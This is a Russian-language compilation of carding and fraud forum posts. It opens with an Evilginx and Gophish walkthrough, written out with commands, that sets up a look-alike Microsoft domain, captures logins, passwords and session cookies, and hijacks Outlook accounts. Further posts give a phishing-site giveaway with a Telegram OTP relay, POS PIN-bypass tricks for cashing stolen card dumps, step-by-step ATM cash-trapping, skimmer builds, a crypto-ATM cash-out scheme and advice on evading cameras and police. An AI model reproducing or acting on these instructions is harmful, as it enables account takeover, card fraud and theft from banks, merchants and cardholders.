Целевым веб‑ресурсом я выбрал Outlook, фишлет к которому уже написан и опубликован в репозитории на GitHub. Скачиваем его и перемещаем в директорию ~/evilginx/phishlets.

Запускаем Evilginx с фишлетом:

Code:Copy to clipboard

sudo ./evilginx -p phishlets/

И начинаем настраивать фишинговые компоненты. Первым делом задаем URL, который пользователь будет видеть во время проксирования трафика. Нужно придумать такое имя хоста, которое не будет вызывать подозрений. Я добавил два поддомена к своему имени хоста:

Code:Copy to clipboard

microsoft.outlook.webaccount.site

Так как поддомены необязательно должны быть уникальными, мы используем это свойство для добавления известных и авторитетных имен. Указываем имя хоста и активируем фишлет:

Code:Copy to clipboard

phishlets hostname Outlook microsoft.outlook.webaccount.site
phishlets enable Outlook

В этот момент Evilginx будет автоматически получать сертификаты SSL/TLS для всех доменов и поддоменов, которые используются в атаке, чтобы фишинговый URL, да и соединение в принципе работали по протоколу HTTPS.

Через 30 секунд успешно получаем все сертификаты SSL/TLS и двигаемся дальше.

Готовим приманки​

Следующие в очереди приманки, они же Lures в официальной документации. По факту это просто сгенерированные фишинговые ссылки, которые мы отправляем. Настройка очень проста, сначала создаем приманку для фишлета Outlook:

Code:Copy to clipboard

lures create Outlook

Консоль выведет числовой идентификатор приманки, он нам еще пригодится. Приводим ссылку к такому виду:

Code:Copy to clipboard

https://microsoft.outlook.webaccount.site/user/account

Копируем сгенерированную фишинговую ссылку и переходим в Gophish.

Запускаем фишинговую атаку​

Теперь откроем вкладку Campaigns и соберем все воедино. Пишем название кампании и выбираем по заданным именам: шаблон электронного письма, профиль отправки и группу пользователей.

Выбрав все компоненты, вставляем сгенерированную ранее ссылку в поле Evilginx Lure URL и нажимаем на кнопку Launch Campaign.

После запуска кампании мы видим статистику, которая ведется в режиме реального времени. Пока что четыре сообщения отправлены, но никем не прочитаны.

Проверяем почту и видим, что фишинговое сообщение дошло.

Нажав на профиль отправителя, замечаем, что тут указано всё то, что мы прописали в шаблоне электронного сообщения Gophish. Невнимательный пользователь, скорее всего, даже не будет проверять, но если кто‑то и проверит, то есть вероятность, что слово microsoft в названии домена убаюкает подозрительность.

Сразу же проверим, работает ли трекер, отслеживающий открытие сообщений. Видим, что просмотр сообщения регистрируется, статус пользователя в столбце Status меняется, к тому же обновляются диаграммы.

Вернемся к нашему фишинговому письму. Когда мы наводим курсор на кнопку «Подтвердить», в нижнем углу браузера видим ссылку, по которой мы перейдем после нажатия.

Имитируя действия потенциальной жертвы, переходим по фишинговой ссылке и ждем, пока браузер проверит, безопасная ли это страница.

Нас перенаправляет на настоящую страницу авторизации Microsoft, но при этом весь трафик проходит через наш обратный прокси‑сервер вот с таким доменом:

Code:Copy to clipboard

live.microsoft.outlook.webaccount.site

Вводим логин и пароль, после чего получаем запрос на подтверждение второго фактора аутентификации в приложении Microsoft Authenticator.

Продолжая имитацию действий потенциальной жертвы, подтверждаем вход в мобильном приложении и ждем, пока пройдет аутентификация.

И в итоге входим в учетную запись. При этом соединение все еще происходит через прокси‑сервер потенциального злоумышленника.

Открываем консоль Evilginx и видим логи успешного перехвата.

Вводим команду

Code:Copy to clipboard

sessions [ID сессии]

И получаем информацию, которая содержит время перехвата, IP-адрес жертвы, User agent, логин, пароль и cookie сеанса.

Логин и пароль — это, конечно, важная и критическая информация, но смысл этой атаки — перехватить токен сеанса в виде файла cookie. Чтобы проэксплуатировать перехват сессии, копируем всю строку cookies и открываем браузер.

Устанавливаем расширение Cookie-Editor, которое позволяет манипулировать куками, и открываем легитимную страницу входа в Microsoft Outlook. Перед тем как подменять cookie, удаляем те, что назначены браузером. Для этого просто нажимаем кнопку Delete All.

Затем нажимаем кнопку Import и вставляем сплошную строку из перехваченной сессии в Evilginx. Теперь еще раз нажимаем на Import и обновляем страницу.

После обновления страницы браузер обрабатывает куки, которые мы внедрили, и открывает учетную запись пользователя, у которого был перехвачен сессионный токен.

Раздобыв учетку Microsoft в любом сервисе, мы также получаем доступ к основным настройкам и ко всем сервисам этой учетной записи. Это может быть довольно критично, особенно учитывая, сколько конфиденциальной информации может храниться в OneDrive или в документах Word.

Подводим итоги​

Задача Gophish заключается не только в автоматизации рассылок, но и в ведении статистики, например для подготовки отчетов о результатах атаки, которые пригодятся пентестерам. После завершения кампании мы получаем статистику о том, кто открыл письмо, кто перешел по ссылке, кто попался на фишинг и ввел креды или же что‑то заподозрил и пожаловался на письмо.

На этом наша фишинговая кампания завершена. Как видим, для проведения этой атаки нам потребовались только базовые технические знания и навыки, а также небольшое финансовое вложение в аренду сервера и домена.

Есть еще огромное множество методов, которые сделают атаку более изощренной, но моей целью было показать базовый вариант, который тем не менее вполне может применяться на практике.

Автор @kotoamatsukami Наделяев Георгий
Источник xakep.ru

You must have at least 5 message(s) to view the content.

Сливаю свой самописный фиш по юсе.
Изначально это был заказ, но заказчик разрешил мне это выложить на общее.​

Из функционала:

• Админка для добавления Марок и Моделей машин.
• Поиск машин с работающиим (почти) фильтами.
• Дизайн честно украден с темфореста и слегка изменен.
• Есть незаконченный страйп, который по желанию можно доделать или вовсе не использовать.
• В нативной платежке есть отп работающий через бота в телеграме, пуши я тогда сделать не догадался в силу того что глупый и молодой был. + проверка номера карты по алгоритму Луна, то есть вписать абрукадабру туда не получится, разве что тестовые карты по типу 4242 4242 4242 4242, что в целом то и является валидной картой.
• Псле оплаты человек получает выписку об оплате, чтоб немного успокоить его.

Настройка:

1. Меняете токен и чат айди в /bot/resolver.php
2. Ставите вебхук на этот же файл. (Это подразумевает, что файлы уже лежат на хостинге, с привязанным доменом и SSL сертификатом (Дешевые домены можно купить у меня))
3. Создаете базу данных и вписываете все данные в admin/connect.php

После этого у вас все должно работать, таблицы создаются сами после добавления первой машины в базу, фотки берете из интернета

БОНУС кстати внутри есть отредаченные мною фотки машин с убранными лого других автосервисов

You must spend at least 30 day(s) on the forum to view the content.


[ DropMeFiles – free one-click file sharing service

](https://dropmefiles.com/rfYwO)

Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.

dropmefiles.com

фишка с ПОСТ терминалов, (но действует не на всех ПОСТ терминалов), читал где то, то что если имеется Банковская карта но при этом не знаешь пин-код, то оплатить можно с ней, даже не зная пин код. Для этого, я пошел в мак дональс, что бы проверить это, (со своей карточкой), вставил карточку набрал пин код 6666 (без разнице какой пин будете вводить), после чего нажал на красную кнопочку, (не зеленую как всегда мы привыкли), и смотрю платеж успешно прошел!, Я сначала не понял... Ну пошел в торговой центр, купил вещи, и опять вставил карточку, но там уже когда ввел 6666, у меня не получилось провести операцию. Вернулся в мак дак, и снова купил кофе, оплатив при этом опять карточкой, воспользовался той же схемой, и прошел пин код Успешно!,
Грубо говоря, я почитав на американском сайте (точно не помню на каком), оказалось что есть ПОСТ терминалы на которых прошивка старая, и это лазейка работает. Если у кого то в городе есть магазины где имеются ПОСТ терминалы, советую проверить ) Я когда офиком работал у нас одна официантка , так и оплачивала заказы, что бы лишний раз к клиенту не бегать с терминалом , она тупо проводила без пин кода.

В точках питания,клубах и т.д. такое канает,но никак не зависит от модели пос терминала

Кстате, есть еще фича одна, только не знаю на каких точно моделях/прошивок используется данная уязвимость, но не давно узнал вот такую инфу: Вставить карту в пост терминал, ввести любое 4х значимое число, и нажать подряд 3-4 раза (зеленую кнопку)....

С помощью этой информации вполне можно вещевухой налить дампы по track2 без пина)

Есть еще такая штука coincard - записывает дампы , до 99 шт в память - и грубо 1 картонка=99 карт)))с пинами есесно)

Действительно так и есть, на старых терминал это работает, например на verifone vx520, так же как и функция '' ручного ввода '' , когда вводишь номер карты/Дату/Свв ,указываешь сумму и лаве падает с карты на банковский счет к которому привязан POS терминал. По данной схеме работают до сих пор)

В посах как в Ашане есть обход три раза вставляете обратной стороной не чипом а пластиком, после третьей ошибки картинка на дисплее меняется на провести магнитной ленто проводите и не смотря на то что карта с чипом покупка пройдёт. Методы анонимности думаю знает, маска, очки одежда с помойки одноразовая, никаких телефонов. Заливать дампы можно на любые старые как бонусные так и банковские карты где есть магнитная полоса, хоть от спортмастера то есть они как в качестве балванок идут.

То одеваем маску очки, шмотьё с помойки и идём на дело в Ашан ?) потому что только Ашане такие посы, х#й с ним дальше ты повествуешь что записал можно на бонусную карту ? Аххахаха
ну ты Бандит пздц) стоит бомбажара в бог пойми что одет и рычит бонусной картой в пос терминал хахахаха дальше когда утомлённые вздохи москвичей и навязчивый испанский стыд становится слышен в виде вздохов заебаных москвичей или не уравновешенной кассирши вмешивается охрана короткий диалог кассира с охраной
- Выведите этого полоумного он на бонусную карточку м видео пытается купить спиртного на 120 тысяч
- да уже иду
И со свойственной злорадной ухмылкой и греющей душу мыслью что кто то ещё больше нищий чем он, плюс дурак на всю голову - охранник подходит к этому ни чем не примечательному человеку и approved код 01
Операция одобрена)
Мобилы нет, на месте решить не может, линейный отдел пронишись атмосферой чистого позитива, со слезами на глазах пересказывают эту историю своим коллегам переодически соываясь в диком ржаче, даже фотографируются на память и в сотый раз пересматривая видео понимают что ни чем не могу помочь ) но всем весело)

Терминалы верифон. Рабочие, подключенны к действующим фирма EU. Карту с чипом после 3 ошибки чипа отсылает на прокатать ленту + пин код. И вуаля, транзакция подтверждена и фискальный чек. Понятно что бины только EU, но получается так что 201 налиться ещё и как
засунуть карту 201 другой стороной другого эмитета в терминал иного эмитета 3 раза, дождался надписи «протянуть в ...» протягивал +пин и транзакция проходит. Холдер тест был по бину той же страны, какой и пос. Но при этом холдер путешествующий но очень редко рассчитывающийся тестовой картой в регионе тестирования. Понятно что регион лок тут отпадает ну а так механизм работает
Если брать юсу, то там по сей день велик % как атм для работы 201, так и 101 дампов.

Видеонаблюдение в самих атм, может стоять до 16 каммер, зависит от модели атм и внутреннего регламента СБ банка, но не менее 4 по условиям пл.систем. Таким образом идёт запись картирдера, пинпада, шаттера, и будьте уверены, что ваш фейс ещё записывают с 2-3 сторон. Основные камеры начинают запись только после того как вствляешь карту в картридер, но есть как минимум одна, как правило это кемера над монитором(не всегда), которая работает постоянно. Исходя из всего выше сказанного, внешность нужно менять по максимуму когда налишь через атм и не только))) кстате вот вам плюшка, до того как вставил карту в картридер на пинпаде нажмите 456, попадёте в меню, покажет по минимуму, что стоит и что работает. Не забывайте так же, что у каждого атм есть наружные камеры, которые могут снять с 10-15 метров легко. Записи с камер которые в атм могут храниться до 90 суток, это так же от регламента СБ банка зависит.
Думаю с этим всё понятно, если не понятно кому, прошу задавать вопросы в тему Вопрос - Ответ.

Немного о наблюдении безопасный город что это значит ?, а значит следующее, что в данном городе есть система видеонаблюдения(а она есть практически везде)в реальном режиме времени и имеет центр мониторинга всех процессов подконрольных камер,и камер на прилегающих территориях ,и трассах в том числе и в последнее время это уже глобально. (не буду описывать как этот центр называеться в разных странах названия разные, но суть одна)
Из всего этого,соответственно принятия оперативных решений в той или иной ситуации начиная от мелкого дтп до проявлений разных криминальных элементов или наоборот,скорее наоборот,,,чиновники и разная нечесть, имеея букет полномочий и ресурс гос власти и.т.д и т.п. конечно будут делать свои грязные дела в сфере экономики и похер им на всю эту систему (знают где что и как если будет нужно подотрут запись ),,, а вот бедолага Кардер совсем не хочет стать артистом плохого кино, популярность она на х....й не нужна ,остаться верным своему делу,да.

Так вот начнем, мы в теме и упор делаем на случайности и некоторые закономерности, мы знаем что есть система видеонаблюдения на дорогах,на зданиях, подьездах, на автомобилях,,,на атм и над атм. Прежде всего нужно научится думать, и только потом работать.

Вообщем работаем! Заранее провели разветку местности и.т.д все было нормально на тот момент, но не дай бог засада оперативников уже ведеться за атм , люди в своей теме опытные и очень сложно распознать не профессионалам за зачастую и им сложнее, если у человека есть мозг, обращаем внимание на припаркованные вблизи тонированных авто (на возможность припаркованных во дворе тонированных или подозрительных микроавтобусов и не только их) Не лежит душа, чувствуешь не то, не ставь, не наль.
Движение в городских условиях так же и людское велико трудно распознать вообщем, и дабы не попасть уже под засаду, не в коем случае не работайте второй раз по атм, и будем надеяться на себя,на свое чутье, интуицию, опыт, интеллект и удачу, и не дай бог такому случиться конечно.

По факту приехали на место взяли скимм планку или все в одном корпусе не важно, оставили автомобиль по дальше от потенциального объекта установки оборудования (убедились что нет внешних камер) много есть и скрытых которых и не заметишь, просто думайте головой, нужна ли тут для чего то камера или нет.
Все вроде нормально,но работа уже началась как только ты взял оборудование в руки, или положил в авто
нужно поставить оборудовани и удачно снять его, доехать от точки А до точки Б. Как только поставили ским, нужно не на секунду не выпускать атм из вида, всегда смотреть, что происходит у атм, если сб спалила ским, то вы заметите этого человека, поведение будет отличатся от простого холдера. Если оставить там без присмотра, можно придти, а там засада, тут могу посоветовать, допустим планку снимает один, скимер другой человек, и до конца кричать, отпало, не моё в случае чего. Бить будут правильно, долго и больно и не только бить, имейте ввиду.

А может где то засветился под камеру все таки ??? так вот сел в авто имей при себе комплект одежды, переоденься,смени хотябы верхнюю часть одежды кепку другого цвета ,верхнюю одежду, очки), при этом сделай все спокойно, непринужденно, не привлекай лишнее внимание прохожих опять же возвращаемься к вышесказанному ,,обращаем внимание на припаркованные автомобили и сидящих в ней людей кто как и куда смотрит будь уже бдительным и осторожным от начала до конца, и будь естественным прежде всего.

Широкое распростронение имеют место быть китайские видеорегистраторы, внимательно осмотри припаркованные автомобили или
только что подъехавший автомобиль(ли) к месту установки оборудования или вблизи ,,,,ведь даже осмотрел все
и вроде не заметил камер, все равно всех их не увидишь, разве только под лобовым стеклом ,,,и тут случайно
ты попал в поле зрения видеорегистратора, а хозяин данного авто и (((чудокитайскойматьеетехники-вместевзятых))) окажеться добропорядочным и бдительным гражданином и сунет свое рыло не в свои дела ,что нам совсем уж не на руку !
Вывод господа, на все эти случайности и некоторые закономерности ??? работать нужно очень аккуратно и постараться свести эти самые риски к минимуму, можно много еще конечно об этом написать, но всех моментов не затронуть, каждый обнал и отстава разные в корне.

Надеюсь содержимое данного текста поможет в Реале новичкам быть ну хоть немного бдительнее, не бежать со всех ног лепить свежеиспеченный скимм на атм, подумай - продумай, когда поймешь, что пришло время, ставь !!! Это как плётка, доставай лишь в том случае, если точно уверен что будешь стрелять.

Работай,зарабатывай и не расслабляйся, не теряй ту самую изначально имеющююся бдительность и осторожность,не стройте иллюзий
обращайте внимание на возможную слежку за вами,могут вести до самого места,дома (дислакации) идете к своему дому за несколько сотен метров, сделайте следующее, ураните случайно ключи пачку сигарет зажигалку что нибудь,сделайте шаг вперед машинально повернитесь чтоб поднять, посмотрите быстро кто идет за вами или едет, то кто на вас смотрит в тот момент, возможно автомобиль припаркованный которого 1 мин назад не было и там находиться человек ))в момент отвернувший свой взляд от вас,застаньте в расплох противоборствующюю сторону, если заметили слежку не подавайте ни в коем случае виду иначе это снижает ваш шанс уйти,если нарушка была раскрыта и на вас уже достаточно материала вас постараються принять, найдите возможность оторваться от хвоста не идите домой,не едьте на вокзалы выбирайтесь на попутном транспорте если вы не решили остаться в том городе если есть безопасное место ,достаточно безопасное,объективно безопасное ,выключите телефон если он у вас с собой? вытащите батарею не звоните ни кому, постарайтесь найти место где вас не будут искать!? не паникуйте помните человек тонет не от того что он не умеет плавать ))) а от того что перестает думать, дальше уже конечно по обстаятельствам ,первые важные правила вроде расписал да не забудьте что вам очень будут нужны деньги
имейте где нибудь заначку в $ на такой момент,не тратьте кеш с обналов - отстав, делайте накопления на всякий случай, он может наступить очень быстро если потеряете нить осторожности.

По нашему опыту мы всегда рекомендуем проводить наблюдение за АТМом в течение 2-5 суток непрерывно, посменно меняя друг друга.

За время наблюдения вы узнаете основные важные моменты, которые скажутся на эффективности вашей дальнейшей работы, очень важно зафиксировать:

• время посещения технических работников банка (инкассаторов),
• время патрулирования этого района полицией (время и методики),
• интенсивность потока холдеров в течении суток и когда он наиболее максимален (эти данные помогут вам спланировать оптимальное время установки),
• когда меньше всего народу на улице (вы будите знать когда вам лучше ставить и снимать аппаратуру).
• статистика общего кол-ва людей, прошедшего через АТМ скажет об ориентировочном уровне дохода.
• при наблюдении немаловажно прочувствовать обстановку места, что за народ ходит, бедные или богатые, туристы или домохозяйки. Это также влияет на потенциальный уровень дохода с места.

Вилка работает так - Вставляете дроповую карту и снимаете скажем 100 рублей,атм их выдает.
Вставляете вилку и забираете эти деньги.

Атм закрывает шторку и после этого вставляете еще раз карту но
уже со вставленной вилкой в атм и заказываешь крупную сумму.

Атм начинает отщелкивать деньги в диспенсер и делает отмену операции так как не может выдать деньги, после отмены деньги с карты не списываются которые снимаете,
они остаются на карте но бабки которые отсчитал атм уже в диспенсер внутри банкомата и они когда отсчитываются попадают в вилку.

После этого атм уходит в сервисный режим и просто поднимаете шторку диспенсера и вынимаете деньги вместе с вилкой.

Минус такой - почти все атм после одного такого действия виснут и если работаете с вилкой, придется объехать несколько атм за ночь.
оттестирована на ncr 86 и 87 моделей, про остальные ничего сказать не могу.

самые распространенные это уличные нцр 5887

Делаем тестовую выдачу,купюра вышла,вставляем вилку между верхним и нижним ремнем по центру,
впихиваем до конца,чтобы загиб на откидной ручке уперся в ремни.Шторка начинает зыкрываться, Чтобы потом

легко поднять было шторку ловим ее пластиной 1мм сверху но это не обязательно но если этого не делать
то придется мощной отверткой потом поддеть шторку и открыть ее.Далее делаем выдачу крупной суммы.
Подача мани началась,держим в этот момент крепко шторку,чтобы она не открылась.Атм видит ошибку,выдает с ней чек или уходит в ребут.

Открываем отверткой шторку,вынимаем вилку с мани. У некоторых даже в сервисный режим не уходит
атм. (НЕ ЗАБЫТЬ ОТВЕРТКУ)

1. Вставляем очень аккуратно и вытаскиваем так же чтобы не оторвать усы так как они приделаты отдельным
компонентом и у некоторых когда что-тозастревало просто сильно дергали вилку и они отлитали.
2. Если всетаки будете ставить миллиметрокую пластинку то не переусердствуйте и толще не делайте а то
атм раньше времени уйдет в оффлайн когда будет защелкивать шторку.
3. Бывает, что когда только вставляют вилку то не успевают засунуть или криво засовывают и поэтому
ременный привод диспенсера не может крутиться и опять атм зависает.
Впринципе работать с ней не сложно только аккуратно все делайте и поучиться придется. С первого
раза у многих не получается.
4. Карта с которой работаете живет максимум 3 дня и обнаружится все когда инкасация увидит недосдачу.
Датчиков никаких не стоит обычно.
https://aliexpress.ru/store/347654?spm=a2g0v.search0204.3.4.e29d9abbqYtyy4

RFID считыватель на основе arduino до 2 метров расстояния.

Электронные ключи доступа и пластиковые карточки прочно вошли в нашу жизнь. Как оказалось считать с них информацию довольно просто. Достаточно воспользоваться небольшим собранным устройством на основе микроконтроллера, считывателя RFID меток и поместив все это в сумку из под ноутбука спокойно считать информацию не только с электронных ключей , но и информацию с пластиковых карточек — те самые которые не с чипом, а с электронной полосой.

В этом устройстве используется микроконтроллер Arduino Nano, его питание 3,3 Вольта. В качестве RFID считывателя использоваться может любой его цена зависит от дистанции на которой он может считывать. Чтоб считывал с дистанции метра два цена его будет составлять около 400 долларов, если расстояние сантиметров 20 то цена порядка 150 долларов.

В общем все детали можно купить в интернете с доставкой домой. Не буду указывать где именно, но пытаюсь сказать что таскать с собой пластиковую карточку даже в обычном бумажнике или кармане довольно таки небезопасно. Про электронные ключи доступа можно сказать что скимнуть их еще проще, обычно они валяются где попало на столах или возле компьютера.
На рисунке видно что считанная информация сохраняется на обычно карточке в файле cards.txt.

По этой и еще паре причин я таскаю пластиковые карточки в металлической визитнице.
На видео более понятно смотрим.

RFID считыватель своими руками из контроллера и мотка медной проволоки.
Так как цена RFID устройств кусается ничто не мешает сделать его самому из мотка медной проволоки и еще нескольких деталей.

Основная задача контроллера это прочитать поток данных. Известно что частота считывания составляет 125 кГц. А карточки доступа используются повсеместно, кстати еще они используются в супермаркетах для предотвращений потерь. Метки устанавливаются и на одежду и на бытовую электронику, пожалуй только не помещаются в колбасу, сыр, чипсы и пиво . В общем в продукты.
Два студента построили RFID считыватель из подручных средств и подробно описали как они это сделали. Включая схемы диаграммы и прочее. Вот это ихнее устройство с ихними студенческими карточками.

И вот их сайт:http://csql.ru/go.php?to=https://in...6/FinalProjects/s2006/cjr37/Website/index.htm

Аудио-ским на Diebold

Приветствую, в данной теме показано как собрать аудио-скиммер за 10мин,особо не тратясь
Данный способ знают все,но всё же давайте по подробнее
Нам потребуется:китайская ручка-шпион, головка от магнитофона,батарея от телефона(860mah хвати),2проводка разных цветов, изолента и паяльник.
С чего начнем?
Разумеется с выбора китайской ручки-шпиона
Ручки бывают уже с встроенной памятью(2-16GB) или со слотом для флешки micro- sd,данный стафф легко распространен и кардится в китай шопах. Лучше сделать несколько моделей ручек с разных китай шопов.
И так, берем ручку, откручиваем низ ручки где стоит стержень, видим вход для зарядки(он может быть 2х видов(вход для провода как на плеерах,нокии 6300 и тд) или просто USB

Мне попалась USB.Снимаем корпус ручки,перед нами остается только плата
Вот фото данной платы:

На ней всего 2 кнопки: Вверху-вкл/выкл, в середине-сброс
А так же 2 лампочки: желтая-зарядка/ожидание, синяя-идет видеозапись

Нужно заменить аккум,а то ским проработает не долго, снимаем старый и ставим новый аккум,он будет располагаться вверху морды
Перед тем как припаять головку,нам нужно увеличить провода которые будут соединять голову с платой,отпаиваем старые(они на фото:красный и черный), припаиваем проводки примерно 4см чтобы был небольшой запас и голова стояла в прозрачке как положено.
к проводам паяем голову-осталось все только правильно установить и залить.Камера устанавливается под углом(тут нужно будет замерять у атм правильно ли она стоит)
Итого получится(фото взято с инета):


Данные аудио кишки подходят только к дибу оптева)сейчас много моделей данной фирмы оснащены датчиками на скиммеры.Как проверить есть ли такой датчик?
А все очень просто,в темное время суток лепим на картоприемник гвоздь на скотче и ждем)если в течении 30мин он не ушел в офф и никто не приехал,то на данном АТМ не установлена данная антискиминговая система.
Еще возможны помехи создаваемые АТМом,экранируйте свои девайсы)
PS Перед установкой кишков еще раз проклейте морду с внутренней стороны(как бы не уверяли вас селлеры в крепкости морд),а то может случиться маленькое недоразумение

Многих (особенно начинающих) мучает вопрос: "Какие кишки мне поставить на мой скиммер/девайс?". От ответа на этот вопрос зависит очень многое:
- Процент счита;
- Время работы;
- Качество и быстрота декода;
- Обход систем защиты;
- Ваше продвижение по "Карьерной лестнице реала".

Кишки - это внутренняя электронная часть скиммингового устройства, отвечающая за обработку и запись информации, содержащийся на магнитной полосе пластиковой карты.
Аудио.

Для начала рассмотрим классические аудио-кишки. Принцип любых аудио кишков состоит в записи звука с магнитной ленты кредитной карты. По сути, аудио-кишки являются обычным диктофоном, который записывает звуковые данные, поступающие с аудио-головки, которая расположена на месте микрофона. Далее звуковые данные необходимо обработать (декодировать). Качество аудиоданных зависит напрямую от частоты дискретизации. Процесс декодирования аудио данных зависит от многих факторов и, в некоторых ситуациях, может быть затруднителен. Время, необходимое на декод одного аудио-трека от 5 до 30 минут.
В своем большинстве, стоимость данных кишков невелика, порядка 10-50 долларов. Размер колеблется от 10х20 до 60х60мм. Потребление питания достаточно велико, по сравнению с флешовыми кишками. Обычно объема памяти хватает на продолжительную запись. Многие выбирают аудио из-за возможности декодирования в нестандартных условиях (шумка, издаваемая АТМом; джиттер; криворукий холдер). В своем большинстве аудио не имеют шифрования. Как правило аудиокишки считывают только второй трек.
В качестве кишков можно использовать миниатюрные диктофоны, типа " Edic-Mini".

Далее рассмотрим радио-кишки.

Принцип работы радио кишков основан на передающем модуле, который вставляется в морду и приемнике, который расположен поблизости АТМа (как правило расстояние от 10 до 200 метров), т.е. состоит из "радио жука" и радиостанции с диктофоном (в качестве диктофона не редко используется планшет или КПК). В зависимости от типа передатчика могут возникнуть проблемы с подстройкой частоты. Приемник часто бывает совмещен с диктофоном, который записывает полученные аудиоданные. Большим минусом такого типа кишков являются радиопомехи, которые значительно могут затруднить счит.
Время, необходимое на декод одного аудио-трека от 5 до 45 минут. Стоимость данных кишков будет начинаться от 100 долларов. Размер от 5х10м до 10х30мм. Еще один неприятный момент этого типа кишков является крайне большое потребление питания. Не требуют жестких условий в объеме передаваемых данных, т.к. на стороне приемнике можно ставить диктофон (или другое записывающее устройство) с любым объемом памяти. Приобрести можно на "шпионских сайтах", радиолюбительских сайтах, карж-сайтах, радио рынках.

Блютуз-кишки, по своему действию похожи на радио кишки.

Они так же имеют принимающий модуль, который сохраняет полученные аудиоданные. Кишки состоят из блютуз-гарнитуры и мобильного телефона (или планшета). Приятной особенностью данных кишков является передача данных в цифровом формате, следовательно никакие помехи им не страшны. Неприятной особенностью данных кишков является DSP-процессор, который может фильтровать данные в режиме реального времени (он применяется производителями мобильных устройств для фильтрации различных высокочастотных шумов и писков, типа ветра).
Время, необходимое на декод одного аудио-трека от 5 до 30 минут. В старых кишках (Samsung WEP-410) DSP-процессор отсутствует. Стоимость данных кишков составляет от 100 долларов. Размер передающего модуля от 10х20мм до 20х30мм. Потребление питания такое же, как у радио кишков. Не требуют жестких ясловий в объеме передаваемых данных. Считывает шумку и джиттер так же, как классические аудио кишки. Не имеют шифрования.

Далее идут GSM-аудио.

Принцип работы основан на двух сотовых телефонных аппаратах, один из которых передает аудиоданные, а второй, в свою очередь, записывает в своей памяти телефонный разговор. Некоторые используют GSM-жучки китайского произвоства, по типу N9 (GOOGLE: GSM жучок N9). Кишки так же, как и блютуз, используют DSP- процессор.
Стоимость данных кишков составляет от 150 долларов. Время, необходимое на декод одного аудио-трека от 5 до 45 минут. Потребление питания достаточно велико, приближено к блютуз кишкам. Большие размеры, по сравнению с аналогами из других категорий кишков 50х50мм приблизительно. Большое потребление питания. Не требуют жестких ясловий в объеме передаваемых данных. Приобрести можно на сайтах, торгующих шпионскими устройствами, китайских сайтах, радиорынках.

Последние аудиокишки, которые я хотел бы обсудить - это "Шпионские устройства", по типу ручек с встроенной камерой, брелков и т.д. Последние выпускаемые шпионские устройства имеют достаточно-приятное качество, чтобы работать в скиммерах, типа 2в1 (в одной морде пишется звук и аудио), но само качество исполнения страдает очень сильно. Часто можно встретить зависания, ограниченное время работы (не смотря на большой объем памяти до 32ГБ), поломки. Время, необходимое на декод одного аудио-трека от 5 до 30 минут. Стоимость от 20 долларов.

Флеш.

Хоть принцип работы кишков является в получении аудио данных с магнитной дорожки, но конечным результатом флешовых кишков уже будут, не аудио данные, а данные в текстовом формате, декод которых или уже произведен, или потребуется незначительное время на декод всего дампа. К тому же не требуется каких-то специальных знаний в области F2F декода.
Принцип флешовых кишков состоит в частичном декодировании аудио, а именно в определении таймингов "на лету". Как правило, это делается за счет аппаратных декодеров magtek (21006501-21006541). Реже используются операционные усилители для определения таймингов.
Время, необходимое на декод одного трека от 2 до 119 секунд. Стоимость флешовых кишков на порядок выше, чем аудио. Стоимость начинается от 200 долларов. Размер от 5х7мм. Немаловажным фактором данных кишков является низкое потребление питания от 0,2 ма. В "боевом режиме" могут проработать 6-9 часов с аккумулятором 6-9 ма/ч. Объема памяти хватает на 500 и более дампов. Флешовые категорически не переносят шумку, но джиттер читают достаточно хорошо. Как правило, все флешовые кишки имеют встроенное шифрование, которого вполне достаточно для сдачи девайса в аренду, но категорически недостаточно для защиты от экспертов в области дешифровки данных, т.к. в основном там используется XOR-шифрование, иногда совмещенное с "плюс-минус байтом" (т.е. например у нас есть оригинальный текст 123456, после данного метода текст будет 214365). Все флешовые кишки считывает 2 или 3 трека.

Радио флеш отличается от обычного флеша тем, что данные передаются на принимающий модуль, расположенный вблизи АТМа. Вместо памяти используется приемо-передающая микросхема (или подобный модуль), типа nrf24l01, имеющая свой цифровой протокол передачи данных, которой не страшны внешние помехи. Стоимость таких кишков будет от 300 долларов. размер от 5х7мм. Потребление питания не значительно выше. чем у обычного флеша (0,5 - 0,9 ма). Объем памяти, как правило, крайне велик из-за того, что используется внешний модуль приема данных. Все остальные параметры не отличаются от классического флеша.

Суть GSM-флеш кишков состоит в том, чтобы дампы присылать в виде СМС- сообщений. Сам передающий GSM-модуль имеет большой размер, поэтому он находится поблизости АТМа, а данные передаются на него посредством радиоканала. Т.е. GSM-кишки состоят из радиофлеша и GSM-модуля (в качестве которого не редко бывают мобильные телефоны или планшеты, обрабатывающие полученные данные и отсылающие их СМС-сообщением). Стоимость таких кишков начинается от 500 долларов с размером от 5х7мм и потреблением, как у радиофлеша.

Outroduction

Продажа битка криптоматам. В начале 19го года четверо парней в Канаде украли деньги с около 100 криптоматов, их до сих пор ищут. Естественно многие поправили это в своих автоматах, но не все. В россии криптоматов на продажу нет, только на покупку.

Открываем сайт coinatmradar.com открываем карту, нажимаем BTC И SELL смотрим какие есть варианты. Когда нажимаете на криптомат он пишет что за обменник и что за вид криптомата. Каждый криптомат продает по разному, те кто пофиксили эту проблему выдают чек после оплаты и ожиданием 1го подтверждения, нам такой не подходит. Кто то выдает сразу если видит что комиссия отправления нормальная (как написано в чеке который я приложу), с такими банкоматами отправляйте с высокой комиссией, 5мин до подтверждения у вас в любом случае будет(в этом случае нужно работать с напарником на связи, в худшем случае вы просто обналичите свои битки). Есть криптоматы которые дают сразу как на этом видео

Советую изучить все криптоматы на ютюбе. У меня получалось снимать с Genesis coin, lamassu, shitcoins club.

Если в какой либо стране вы делаете это разово, то вас за это не привлекут так это ошибка самой сети биткоина и криптомата(возвраты даже бывают редко в обычных ситуациях) , но если делать это системно то тут преступная схема на лицо и нужно принимать соответственные меры безопасности. В данных случаях нужно тщательно планировать такие операции и смотреть на гугл картах где находится криптомат, так как некоторые стоят в офисах

Пробую развиваться в этой теме, но все упирается в то, что я не знаю с чего начать заговор, ведь просто написав кучу текста в стиле "Я PR менеджер тот-то тот-то мы хочу сотрудничать" в лучшем случае был проигнорирован, в худшем послан далеко и надолго. Так вот суть вопроса: С чего надо начинать разговор и как аккуратнее подвести лохматого к скачиванию?

**Тема статьи: Социальная инженерия, мошенничество: разбор своих кейсов, свой опыт.

Предисловие:** В тех.части я так себе, поэтому и статьи не мог ранее писать для конкурсов тут, сейчас увидел, что принимаются статьи на тему СИ и мошенничества, что ж, тут я уже могу что-то написать) Надеюсь получится интересно и информативно для вас, читателей
